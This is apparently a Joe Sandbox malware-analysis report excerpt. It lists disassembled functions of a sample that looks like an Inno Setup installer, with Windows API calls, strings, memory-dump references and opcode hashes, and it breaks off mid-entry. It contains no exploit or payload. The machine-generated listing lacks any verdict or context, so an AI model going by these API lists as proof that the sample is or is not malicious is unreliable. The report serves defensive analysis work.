                                                                  Function 00455D70 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
                                                                  • RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                  • String ID:
                                                                  • API String ID: 4283692357-0
                                                                  • Opcode ID: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                                  • Instruction ID: 990a694f9916720730b0810028faebd1b23d30e86244cf38efb64550af4b0806
                                                                  • Opcode Fuzzy Hash: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                                  • Instruction Fuzzy Hash: 7CF090B274070036EA10B6B65C46F2B12DC8F54745F10883AB500EF2C3D57CDC044629
                                                                  Function 0047C52C Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 2227064392-0
                                                                  • Opcode ID: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                                  • Instruction ID: a2b460aa88ecba94892aad5d964071206a8b0d845d3bc1a6a013ae29a0728730
                                                                  • Opcode Fuzzy Hash: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                                  • Instruction Fuzzy Hash: 6FE02B627C916065C62131BE18C25BF464CCBC3364B24463FF0CCE7242C85D5C4A873E
                                                                  Function 00477C98 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
                                                                  • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
                                                                  • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                  • String ID:
                                                                  • API String ID: 215268677-0
                                                                  • Opcode ID: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                  • Instruction ID: 672a73815fb629360b1666c66e1be5f1e4265ed7d7d078eef31aabbee9319095
                                                                  • Opcode Fuzzy Hash: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                  • Instruction Fuzzy Hash: 5FF037716447007FD600E6B58D81E5B73DCEB44354F04883A7E94D71C1D678DC08A726
                                                                  Function 00424238 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastActivePopup.USER32(?), ref: 00424244
                                                                  • IsWindowVisible.USER32(?), ref: 00424255
                                                                  • IsWindowEnabled.USER32(?), ref: 0042425F
                                                                  • SetForegroundWindow.USER32(?), ref: 00424269
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                  • String ID:
                                                                  • API String ID: 2280970139-0
                                                                  • Opcode ID: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                  • Instruction ID: 914cdc97238bca482b123af495550876eb6964b08c7fad051248fc704dde4b2b
                                                                  • Opcode Fuzzy Hash: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                  • Instruction Fuzzy Hash: DEE0EC61706636D7AAA2767B2981A9F618D9DC53C434601ABFC04FB386DB2CDC1181BD
                                                                  Function 0040626C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalHandle.KERNEL32 ref: 0040626F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocHandleLockUnlock
                                                                  • String ID:
                                                                  • API String ID: 2167344118-0
                                                                  • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                  • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                  • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                  • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                  Function 00479BDC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
                                                                  Strings
                                                                  • Failed to parse "reg" constant, xrefs: 00479E44
                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                  • API String ID: 3535843008-1938159461
                                                                  • Opcode ID: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                                  • Instruction ID: 5eaaab04e28549974a1eae9ca1a9eb8293ffddd3d671f6967ea537ac56f3ac17
                                                                  • Opcode Fuzzy Hash: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                                  • Instruction Fuzzy Hash: 81814174E00148AFCF11DF95C881ADEBBF9AF49314F50816AE815BB391D738AE45CB98
                                                                  Function 00482B48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
                                                                  • SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
                                                                  Strings
                                                                  • Will not restart Windows automatically., xrefs: 00482CB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveForeground
                                                                  • String ID: Will not restart Windows automatically.
                                                                  • API String ID: 307657957-4169339592
                                                                  • Opcode ID: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                  • Instruction ID: 4958210349c6873c441c743532f51790e4d62edc104a08ffbd951144213b1fca
                                                                  • Opcode Fuzzy Hash: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                  • Instruction Fuzzy Hash: 3541F130248240AED711FBA5EE96BBD7BE4EB55304F540CB7E8405B3A2D2FD68419B1D
                                                                  Function 0046CA2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                                  • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                  • API String ID: 0-1974262853
                                                                  • Opcode ID: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                  • Instruction ID: 55592184c39aac83035684310b8d0626f6b8fe487ab2a4e85d8be474453688ef
                                                                  • Opcode Fuzzy Hash: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                  • Instruction Fuzzy Hash: 49318D30604208DFD711EB99D98ABAA77F5EB05704F5500BBF448AB3A2D7797E40CB4A
                                                                  Function 0047892C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                                  • %s\%s_is1, xrefs: 004789A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                  • API String ID: 47109696-1598650737
                                                                  • Opcode ID: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                                  • Instruction ID: 1902e23b80ae68d1a407740dd401f48df33a1007776b0bbafa0d95379bb3c34b
                                                                  • Opcode Fuzzy Hash: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                                  • Instruction Fuzzy Hash: AF216474B402449FDB01DBAACC556DEBBE8EB89704F91847FE408E7381DB789D018B59
                                                                  Function 0045013C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ExecuteMessageSendShell
                                                                  • String ID: open
                                                                  • API String ID: 812272486-2758837156
                                                                  • Opcode ID: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                  • Instruction ID: 7e6871a26ddddf45a22869efb5a26db0f3e7f81d2927c2b78b58bd6f76e5dadf
                                                                  • Opcode Fuzzy Hash: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                  • Instruction Fuzzy Hash: EE216274E00204AFDB04DFA5C889E9EB7F8EB44705F2085BAB814E7292D7789E44CA48
                                                                  Function 00455264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                                  • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryErrorExecuteLastShellSystem
                                                                  • String ID: <
                                                                  • API String ID: 893404051-4251816714
                                                                  • Opcode ID: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                                  • Instruction ID: ab6e9011ac2a47c3b5942fb44236b8cd8890e3b7caf9c3a2037be21c94c6989b
                                                                  • Opcode Fuzzy Hash: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                                  • Instruction Fuzzy Hash: 3F212370600609AFDB10EF65D8926EE7BE8AF48355F90403AFC44E7281D7789E45CB98
                                                                  Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                  • String ID: )
                                                                  • API String ID: 2227675388-1084416617
                                                                  • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                  • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                  • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                  • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                  Function 0049603A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID: /INITPROCWND=$%x $@
                                                                  • API String ID: 2353593579-4169826103
                                                                  • Opcode ID: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                  • Instruction ID: 17582354874f3a564912cfd2224966d9f48ebc88dda7ed38b5aba0a92b935dc2
                                                                  • Opcode Fuzzy Hash: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                  • Instruction Fuzzy Hash: 1111B731A042448FDF01DBA4D892BAE7FE8EB48314F51447BE504E7282D73C9905CB5C
                                                                  Function 0044740C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                  • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocByteCharFreeMultiWide
                                                                  • String ID: NIL Interface Exception$Unknown Method
                                                                  • API String ID: 3952431833-1023667238
                                                                  • Opcode ID: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                  • Instruction ID: e495528c603fed7e49a6c7636a2d67f8de45625ce5c80b81863372b855da2a7d
                                                                  • Opcode Fuzzy Hash: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                  • Instruction Fuzzy Hash: 7A11D670604208AFEB14DFA58952A6EBFBCEB08304F91447EF504E7282D7789D05CB69
                                                                  Function 004958AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                                  • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                                    • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorHandleLastProcess
                                                                  • String ID: <cI
                                                                  • API String ID: 3798668922-2480932022
                                                                  • Opcode ID: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
